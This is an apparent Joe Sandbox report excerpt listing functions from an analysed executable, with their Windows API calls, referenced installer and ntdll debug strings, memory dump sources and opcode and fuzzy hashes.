                                • API ID: DebugPrintTimes
                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                • API String ID: 3446177414-3492000579
                                • Opcode ID: 873f4c8c80fe7307f7963a38ad1de25d7de6a2fdf887d248a31a0acb0fe3bb86
                                • Instruction ID: 96c0db70f5a2969d6f77981bf6128f4753836d60ec390f7255219a98a2dcb1a5
                                • Opcode Fuzzy Hash: 873f4c8c80fe7307f7963a38ad1de25d7de6a2fdf887d248a31a0acb0fe3bb86
                                • Instruction Fuzzy Hash: 2F714335902688DFDB06CFA8D490AADFBF2FF49344F448059E586AF351CB759981CBA0
                                Function 32D36565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D99843
                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D99885
                                • LdrpLoadShimEngine, xrefs: 32D9984A, 32D9988B
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D99854, 32D99895
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-3589223738
                                • Opcode ID: 4d785a2fa27a0e5a3a3df7a77711bf30fd6ddde0c20e567b3d04966a93f6e502
                                • Instruction ID: 6d4cbab0dcc6250d17e58b84207472d8fed60995e05a4c71b7acf7028b18cfdf
                                • Opcode Fuzzy Hash: 4d785a2fa27a0e5a3a3df7a77711bf30fd6ddde0c20e567b3d04966a93f6e502
                                • Instruction Fuzzy Hash: B1513676A023889FDB05DBB8C855FDD77A5BB40304F840569E651BF395CBB09C81C7A4
                                Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9
                                • API String ID: 1439708474-2366072709
                                • Opcode ID: de9a9b87b4d54610843938f2c97b6a216896488e6d5b1f8db430457174f1f012
                                • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                • Opcode Fuzzy Hash: de9a9b87b4d54610843938f2c97b6a216896488e6d5b1f8db430457174f1f012
                                • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A
                                Function 32D6DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                • API String ID: 3446177414-3224558752
                                • Opcode ID: 9e08aeca1a5a073bc434c14c4cc099e9491eac2f7232596e0f730b9c569d2da6
                                • Instruction ID: b7bfc85e13f50f76a02a408c66727456a82435be40d244d6e11dda7b17b5db73
                                • Opcode Fuzzy Hash: 9e08aeca1a5a073bc434c14c4cc099e9491eac2f7232596e0f730b9c569d2da6
                                • Instruction Fuzzy Hash: 9C418B35608700DFE316CF24D450B6AB7B4FF40328F5485A8E9456F781CBBAA985CBA1
                                Function 32DEECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Entry Heap Size , xrefs: 32DEEDED
                                • HEAP: , xrefs: 32DEECDD
                                • ---------------------------------------, xrefs: 32DEEDF9
                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 32DEEDE3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                • API String ID: 3446177414-1102453626
                                • Opcode ID: e5cf935116600411b02e83c92d0e373bd05fc06f9b94b47c27e1d9847cdfd2b2
                                • Instruction ID: a11e85e3783ca54b2c91f14668ba561e4f64ccd8459e0d4afa99e92dae2729cc
                                • Opcode Fuzzy Hash: e5cf935116600411b02e83c92d0e373bd05fc06f9b94b47c27e1d9847cdfd2b2
                                • Instruction Fuzzy Hash: 7C41043AA02215CFC705DF14C48194ABBF1FF89365B5684A9D505AB310CB31ECC2CBD0
                                Function 32D6DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                • API String ID: 3446177414-1222099010
                                • Opcode ID: abe053bdeaf3a30ce5572d66d3a1fa67fb57fa292114eb00423c2bd507547338
                                • Instruction ID: 5008471e684c71f037130cbbff939038ee67be47ee03f3bbd9f2d57494585e84
                                • Opcode Fuzzy Hash: abe053bdeaf3a30ce5572d66d3a1fa67fb57fa292114eb00423c2bd507547338
                                • Instruction Fuzzy Hash: 14319836101784EFF326CB28E419F6977F4EF05758F0144C4E8416BBA5CBBAE984CA61
                                Function 00406D18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                Strings
                                • *?|<>/":, xrefs: 00406D7C
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-525015898
                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                Function 00405D15 Relevance: 10.6, APIs: 7, Instructions: 76stringwindowCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                • SendMessageW.USER32(?), ref: 00405DB3
                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID:
                                • API String ID: 1759915248-0
                                • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                Function 004056B5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                Function 0040362A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                Function 00406179 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C
                                Function 00402BA3 Relevance: 9.1, APIs: 6, Instructions: 102memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: d8233fe099ea2af2e0409c8d0dbaade6ee1264d4a1629dae062558262f167142
                                • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                • Opcode Fuzzy Hash: d8233fe099ea2af2e0409c8d0dbaade6ee1264d4a1629dae062558262f167142
                                • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                Function 32D49046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$@
                                • API String ID: 3446177414-1194432280
                                • Opcode ID: 5609c342473bcb0603ccd76556bd580c19dba2451212973b6146fea5e979466a
                                • Instruction ID: aac20f4e9d0a9c56079c74e7ff9c0d66713d13b0ee2783576a221b35204d143d
                                • Opcode Fuzzy Hash: 5609c342473bcb0603ccd76556bd580c19dba2451212973b6146fea5e979466a
                                • Instruction Fuzzy Hash: 40812BB1D002699BDB21CF55CC45BDEB7B8AB48714F1045EAEA09B7350DBB05E85CFA0
                                Function 00403148 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNEL32(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134
                                • Opcode ID: 05e5243707f5f7ace503ab87713e90cbe87e1f5fe0e9427802214610f79e4a99
                                • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                • Opcode Fuzzy Hash: 05e5243707f5f7ace503ab87713e90cbe87e1f5fe0e9427802214610f79e4a99
                                • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E
                                Function 32D74C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Querying the active activation context failed with status 0x%08lx, xrefs: 32DB3466
                                • LdrpFindDllActivationContext, xrefs: 32DB3440, 32DB346C
                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32DB3439
                                • minkernel\ntdll\ldrsnap.c, xrefs: 32DB344A, 32DB3476
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-3779518884
                                • Opcode ID: 44010c2e45ac82a98f5cff504b9b2b3da97dcf824006c906f8ae1846ca876373
                                • Instruction ID: ca02286a7fbf5f8f3f5abf415d0ad5d2ed0f29f7a013c1c219c31f2bddd7daad
                                • Opcode Fuzzy Hash: 44010c2e45ac82a98f5cff504b9b2b3da97dcf824006c906f8ae1846ca876373
                                • Instruction Fuzzy Hash: 4631F5B6A01355AFFB139F0C8845B56B3B4AF41399F86816AD9C067750EFA89CC0C6F1
                                Function 00406A31 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNEL32(?,0073006E,00000000,?,?,?,00000000,00403CAF,00436000,00436800,00436800,00436800,00436800,00436800,76073420,0040399D), ref: 00406A68
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-3838866546
                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4
                                Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: f177ed344ea6fd50dbffeb88da14f1b34f7d576460257365899ecec5bb3fd5f3
                                • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                • Opcode Fuzzy Hash: f177ed344ea6fd50dbffeb88da14f1b34f7d576460257365899ecec5bb3fd5f3
                                • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A
                                Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
